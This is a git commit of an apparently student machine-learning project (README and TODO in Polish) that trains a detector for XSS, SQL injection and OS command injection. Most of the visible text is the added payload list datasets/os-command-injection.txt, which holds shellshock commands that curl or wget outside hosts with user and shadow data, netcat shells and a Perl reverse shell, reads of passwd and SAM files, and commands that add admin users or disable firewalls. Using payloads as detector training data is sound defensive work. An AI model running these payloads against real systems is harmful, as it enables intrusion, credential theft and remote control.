commit 5a61942849f8478776ff384e4801341a1deb0b71 Author: Krystian Piwowarczyk Date: Sun Jan 21 17:51:17 2024 +0100 Aktualny stan projektu diff --git a/.idea/.gitignore b/.idea/.gitignore new file mode 100644 index 0000000..26d3352 --- /dev/null +++ b/.idea/.gitignore @@ -0,0 +1,3 @@ +# Default ignored files +/shelf/ +/workspace.xml diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml new file mode 100644 index 0000000..105ce2d --- /dev/null +++ b/.idea/inspectionProfiles/profiles_settings.xml @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/.idea/misc.xml b/.idea/misc.xml new file mode 100644 index 0000000..9de2865 --- /dev/null +++ b/.idea/misc.xml @@ -0,0 +1,7 @@ + + + + + + \ No newline at end of file diff --git a/.idea/modules.xml b/.idea/modules.xml new file mode 100644 index 0000000..bb21ae6 --- /dev/null +++ b/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/.idea/python3-project-bigdata.iml b/.idea/python3-project-bigdata.iml new file mode 100644 index 0000000..d0876a7 --- /dev/null +++ b/.idea/python3-project-bigdata.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..2fe854a --- /dev/null +++ b/README.md @@ -0,0 +1,35 @@ +# Temat projektu + +Projekt zwraca użytkownikowi informacje na temat tego czy przekazany poprzez API ciąg znaków zawiera w sobie próbę ataku z jednej z poniższych klas: +Cross Site-Scripting +SQL Injection +OS Command Injection + +# Dane trenujące + +Do wytrenowania sieci wykorzystano publicznie dostępne zbiory przykładowych payloadów: +https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt +https://github.com/CyberM0nster/SQL-Injection-Payload-List- +https://github.com/omurugur/OS_Command_Payload_List/blob/master/OS-Command-Fuzzing.txt + +Dane "zwykłe" (w rozumieniu - wolne od próby ataku na aplikacje) uzyskano poprzez framework Faker (10200 wartości). +Dane te wygenerowano z użyciem następujących funkcji: +faker.ascii_company_email() +faker.city() +faker.country() +faker.postcode() +faker.street_address() +faker.iban() +faker.company() +faker.credit_card_number() +faker.date_of_birth() +faker.domain_name() +faker.job() +faker.sentence(nb_words=10) +faker.passport_number() +faker.name() +faker.phone_number() +faker.ssn() +faker.user_agent() +Zbiór ten reprezentuje typowe dane wprowadzane przez użytkowników do formularzy w aplikacjach webowych. + diff --git a/TODO.txt b/TODO.txt new file mode 100644 index 0000000..be4789a --- /dev/null +++ b/TODO.txt @@ -0,0 +1,30 @@ +1. Wygenerowanie legitnych danych +2. Wytrenowanie lokalnego modelu - podzielenie danych na treningowe oraz testowe +3. Wystawienie modelu poprzez REST API +4. Stworzenie 2-3 przypadków testowych +5. Przygotowanie environment.yaml condy +6. Udostępnienie aplikacji w sieci wydziałowej (przez ten https://cloud.wmi.amu.edu.pl/#v1:0:18:4::::::: ) +7. Przygotowanie prezentacji na zaliczenie (w tym dane histograficzne - rozkład znaków, długość ciągu znaków w przypadku zwykłych danych oraz ataków (pewnie przy róznych atakach pojawią się określone znaki specjalne) czyli zaprezentować analizę tego zbioru danych (tabelki, wykresy, wnioski)) + + + + + +Projekt ma posiadać environment.yaml condy - konfiguracja środowsika + + + +do tego statystyki danych - jaki procent poszczególnych typów danych znajdował się w zbiorach treningowych, testowych itd. + +dane histograficzne - rozkład znaków, długość ciągu znaków w przypadku zwykłych danych oraz ataków (pewnie przy róznych atakach pojawią się określone znaki specjalne) + + + + + + +Skala ocen: +- Należy wybrać zbiór danych (akceptacja grup oraz zbioru danych przez prowadzącego na pierwszych 17.11.21 lub drugich zajęciach 18.11.23), zaprezentować analizę tego zbioru danych (tabelki, wykresy, wnioski) w max 10 minut- zaliczenie na ocenę 3) +- Należy wytrenować prosty model uczenia maszynowego (lub użyć gotowego modelu) i zaprezentować jego wyniki na zbiorze testowym. Jakość modelu nie będzie oceniana, ale powinien radzić sobie lepiej niż bardzo prosty model (klasa większościowa dla klasyfikacji lub średnia dla regresji)- zaliczenie na ocenę 4 +- Należy wystawić model z poprzedniego punktu w prostej aplikacji REST i zaprezentować jego działanie. Do aplikacji powininy być napisane conajmniej 2-3 proste przypadki testowe- zaliczenie na llocenę 4.5 +- Należy udostępnić aplikację w sieci wydziałkowej 5 \ No newline at end of file diff --git a/__init__.py b/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/__pycache__/__init__.cpython-311.pyc b/__pycache__/__init__.cpython-311.pyc new file mode 100644 index 0000000..bd3417d Binary files /dev/null and b/__pycache__/__init__.cpython-311.pyc differ diff --git a/__pycache__/main.cpython-310.pyc b/__pycache__/main.cpython-310.pyc new file mode 100644 index 0000000..182f883 Binary files /dev/null and b/__pycache__/main.cpython-310.pyc differ diff --git a/__pycache__/main.cpython-311.pyc b/__pycache__/main.cpython-311.pyc new file mode 100644 index 0000000..70fb85c Binary files /dev/null and b/__pycache__/main.cpython-311.pyc differ diff --git a/__pycache__/test_main.cpython-311-pytest-7.4.0.pyc b/__pycache__/test_main.cpython-311-pytest-7.4.0.pyc new file mode 100644 index 0000000..93f8a6b Binary files /dev/null and b/__pycache__/test_main.cpython-311-pytest-7.4.0.pyc differ diff --git a/datasets/os-command-injection.txt b/datasets/os-command-injection.txt new file mode 100644 index 0000000..813b8e2 --- /dev/null +++ b/datasets/os-command-injection.txt @@ -0,0 +1,6055 @@ +<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> +<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> +<!--#exec%20cmd="/usr/bin/id;--> +<!--#exec%20cmd="/usr/bin/id;--> +/index.html|id| +;id; +;id +;netstat -a; +;id; +|id +|/usr/bin/id +|id| +|/usr/bin/id| +||/usr/bin/id| +|id; +||/usr/bin/id; +;id| +;|/usr/bin/id| +\n/bin/ls -al\n +\n/usr/bin/id\n +\nid\n +\n/usr/bin/id; +\nid; +\n/usr/bin/id| +\nid| +;/usr/bin/id\n +` +|| +| +; +' +'" +" +"' +& +&& +%0a +%0a%0d +%0Acat%20/etc/passwd +%0Aid +%0a id %0a +%0Aid%0A +%0a ping -i 30 127.0.0.1 %0a +%0A/usr/bin/id +%0A/usr/bin/id%0A +%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 +%20{${phpinfo()}} +%20{${sleep(20)}} +%20{${sleep(3)}} +a|id| +a;id| +a;id; +a;id\n +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" +() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" +() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" +() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" +() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" +() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" +() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" +() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" +() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" +() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" +cat /etc/hosts +$(`cat /etc/passwd`) +cat /etc/passwd +() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12 +| curl http://crowdshield.com/.testing/rce.txt +& curl http://crowdshield.com/.testing/rce.txt +; curl https://crowdshield.com/.testing/rce_vuln.txt +&& curl https://crowdshield.com/.testing/rce_vuln.txt +curl https://crowdshield.com/.testing/rce_vuln.txt + curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt +curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt +$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) +dir +| dir +; dir +$(`dir`) +& dir +&&dir +&& dir +| dir C:\ +; dir C:\ +& dir C:\ +&& dir C:\ +dir C:\ +| dir C:\Documents and Settings\* +; dir C:\Documents and Settings\* +& dir C:\Documents and Settings\* +&& dir C:\Documents and Settings\* +dir C:\Documents and Settings\* +| dir C:\Users +; dir C:\Users +& dir C:\Users +&& dir C:\Users +dir C:\Users +;echo%20'' +echo ''// XXXXXXXXXXX +| echo "" > rfi.php +; echo "" > rfi.php +& echo "" > rfi.php +&& echo "" > rfi.php +echo "" > rfi.php +| echo "" > dir.php +; echo "" > dir.php +& echo "" > dir.php +&& echo "" > dir.php +echo "" > dir.php +| echo "" > cmd.php +; echo "" > cmd.php +& echo "" > cmd.php +&& echo "" > cmd.php +echo "" > cmd.php +;echo '' +echo ''// XXXXXXXXXXX +echo ''// XXXXXXXXXXX +| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl +; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl +& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl +&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl +echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl +() { :;}; echo vulnerable 10 +eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') +eval('ls') +eval('pwd') +eval('pwd'); +eval('sleep 5') +eval('sleep 5'); +eval('whoami') +eval('whoami'); +exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') +exec('ls') +exec('pwd') +exec('pwd'); +exec('sleep 5') +exec('sleep 5'); +exec('whoami') +exec('whoami'); +;{$_GET["cmd"]} +`id` +|id +| id +;id +;id| +;id; +& id +&&id +;id\n +ifconfig +| ifconfig +; ifconfig +& ifconfig +&& ifconfig +/index.html|id| +ipconfig +| ipconfig /all +; ipconfig /all +& ipconfig /all +&& ipconfig /all +ipconfig /all +ls +$(`ls`) +| ls -l / +; ls -l / +& ls -l / +&& ls -l / +ls -l / +| ls -laR /etc +; ls -laR /etc +& ls -laR /etc +&& ls -laR /etc +| ls -laR /var/www +; ls -laR /var/www +& ls -laR /var/www +&& ls -laR /var/www +| ls -l /etc/ +; ls -l /etc/ +& ls -l /etc/ +&& ls -l /etc/ +ls -l /etc/ +ls -lh /etc/ +| ls -l /home/* +; ls -l /home/* +& ls -l /home/* +&& ls -l /home/* +ls -l /home/* +*; ls -lhtR /var/www/ +| ls -l /tmp +; ls -l /tmp +& ls -l /tmp +&& ls -l /tmp +ls -l /tmp +| ls -l /var/www/* +; ls -l /var/www/* +& ls -l /var/www/* +&& ls -l /var/www/* +ls -l /var/www/* + + + +\n +\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` +\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` +\n/bin/ls -al\n +| nc -lvvp 4444 -e /bin/sh| +; nc -lvvp 4444 -e /bin/sh; +& nc -lvvp 4444 -e /bin/sh& +&& nc -lvvp 4444 -e /bin/sh & +nc -lvvp 4444 -e /bin/sh +nc -lvvp 4445 -e /bin/sh & +nc -lvvp 4446 -e /bin/sh| +nc -lvvp 4447 -e /bin/sh; +nc -lvvp 4448 -e /bin/sh& +\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n +\necho INJECTX\nexit\n\033[2Asleep 5\n +\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n +| net localgroup Administrators hacker /ADD +; net localgroup Administrators hacker /ADD +& net localgroup Administrators hacker /ADD +&& net localgroup Administrators hacker /ADD +net localgroup Administrators hacker /ADD +| netsh firewall set opmode disable +; netsh firewall set opmode disable +& netsh firewall set opmode disable +&& netsh firewall set opmode disable +netsh firewall set opmode disable +netstat +;netstat -a; +| netstat -an +; netstat -an +& netstat -an +&& netstat -an +netstat -an +| net user hacker Password1 /ADD +; net user hacker Password1 /ADD +& net user hacker Password1 /ADD +&& net user hacker Password1 /ADD +net user hacker Password1 /ADD +| net view +; net view +& net view +&& net view +net view +\nid| +\nid; +\nid\n +\n/usr/bin/id\n +perl -e 'print "X"x1024' +|| perl -e 'print "X"x16096' +| perl -e 'print "X"x16096' +; perl -e 'print "X"x16096' +& perl -e 'print "X"x16096' +&& perl -e 'print "X"x16096' +perl -e 'print "X"x16384' +; perl -e 'print "X"x2048' +& perl -e 'print "X"x2048' +&& perl -e 'print "X"x2048' +perl -e 'print "X"x2048' +|| perl -e 'print "X"x4096' +| perl -e 'print "X"x4096' +; perl -e 'print "X"x4096' +& perl -e 'print "X"x4096' +&& perl -e 'print "X"x4096' +perl -e 'print "X"x4096' +|| perl -e 'print "X"x8096' +| perl -e 'print "X"x8096' +; perl -e 'print "X"x8096' +&& perl -e 'print "X"x8096' +perl -e 'print "X"x8192' +perl -e 'print "X"x81920' +|| phpinfo() +| phpinfo() + {${phpinfo()}} +;phpinfo() +;phpinfo();// +';phpinfo();// +{${phpinfo()}} +& phpinfo() +&& phpinfo() +phpinfo() +phpinfo(); + + + + + + + + +:phpversion(); +`ping 127.0.0.1` +& ping -i 30 127.0.0.1 & +& ping -n 30 127.0.0.1 & +;${@print(md5(RCEVulnerable))}; +${@print("RCEVulnerable")} +${@print(system($_SERVER['HTTP_USER_AGENT']))} +pwd +| pwd +; pwd +& pwd +&& pwd +\r +| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +\r\n +route +| sleep 1 +; sleep 1 +& sleep 1 +&& sleep 1 +sleep 1 +|| sleep 10 +| sleep 10 +; sleep 10 +{${sleep(10)}} +& sleep 10 +&& sleep 10 +sleep 10 +|| sleep 15 +| sleep 15 +; sleep 15 +& sleep 15 +&& sleep 15 + {${sleep(20)}} +{${sleep(20)}} + {${sleep(3)}} +{${sleep(3)}} +| sleep 5 +; sleep 5 +& sleep 5 +&& sleep 5 +sleep 5 + {${sleep(hexdec(dechex(20)))}} +{${sleep(hexdec(dechex(20)))}} +sysinfo +| sysinfo +; sysinfo +& sysinfo +&& sysinfo +;system('cat%20/etc/passwd') +system('cat C:\boot.ini'); +system('cat config.php'); +system('cat /etc/passwd'); +|| system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +| system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +& system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +&& system('curl https://crowdshield.com/.testing/rce_vuln.txt'); +system('curl https://crowdshield.com/.testing/rce_vuln.txt') +system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') +system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); +system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') +systeminfo +| systeminfo +; systeminfo +& systeminfo +&& systeminfo +system('ls') +system('pwd') +system('pwd'); +|| system('sleep 5'); +| system('sleep 5'); +; system('sleep 5'); +& system('sleep 5'); +&& system('sleep 5'); +system('sleep 5') +system('sleep 5'); +system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') +system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); +system('whoami') +system('whoami'); +test*; ls -lhtR /var/www/ +test* || perl -e 'print "X"x16096' +test* | perl -e 'print "X"x16096' +test* & perl -e 'print "X"x16096' +test* && perl -e 'print "X"x16096' +test*; perl -e 'print "X"x16096' +$(`type C:\boot.ini`) +&&type C:\\boot.ini +| type C:\Windows\repair\SAM +; type C:\Windows\repair\SAM +& type C:\Windows\repair\SAM +&& type C:\Windows\repair\SAM +type C:\Windows\repair\SAM +| type C:\Windows\repair\SYSTEM +; type C:\Windows\repair\SYSTEM +& type C:\Windows\repair\SYSTEM +&& type C:\Windows\repair\SYSTEM +type C:\Windows\repair\SYSTEM +| type C:\WINNT\repair\SAM +; type C:\WINNT\repair\SAM +& type C:\WINNT\repair\SAM +&& type C:\WINNT\repair\SAM +type C:\WINNT\repair\SAM +type C:\WINNT\repair\SYSTEM +| type %SYSTEMROOT%\repair\SAM +; type %SYSTEMROOT%\repair\SAM +& type %SYSTEMROOT%\repair\SAM +&& type %SYSTEMROOT%\repair\SAM +type %SYSTEMROOT%\repair\SAM +| type %SYSTEMROOT%\repair\SYSTEM +; type %SYSTEMROOT%\repair\SYSTEM +& type %SYSTEMROOT%\repair\SYSTEM +&& type %SYSTEMROOT%\repair\SYSTEM +type %SYSTEMROOT%\repair\SYSTEM +uname +;uname; +| uname -a +; uname -a +& uname -a +&& uname -a +uname -a +|/usr/bin/id +;|/usr/bin/id| +;/usr/bin/id| +$;/usr/bin/id +() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' +() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 +| wget http://crowdshield.com/.testing/rce.txt +& wget http://crowdshield.com/.testing/rce.txt +; wget https://crowdshield.com/.testing/rce_vuln.txt +$(`wget https://crowdshield.com/.testing/rce_vuln.txt`) +&& wget https://crowdshield.com/.testing/rce_vuln.txt +wget https://crowdshield.com/.testing/rce_vuln.txt +$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) +which curl +which gcc +which nc +which netcat +which perl +which python +which wget +whoami +| whoami +; whoami +' whoami +' || whoami +' & whoami +' && whoami +'; whoami +" whoami +" 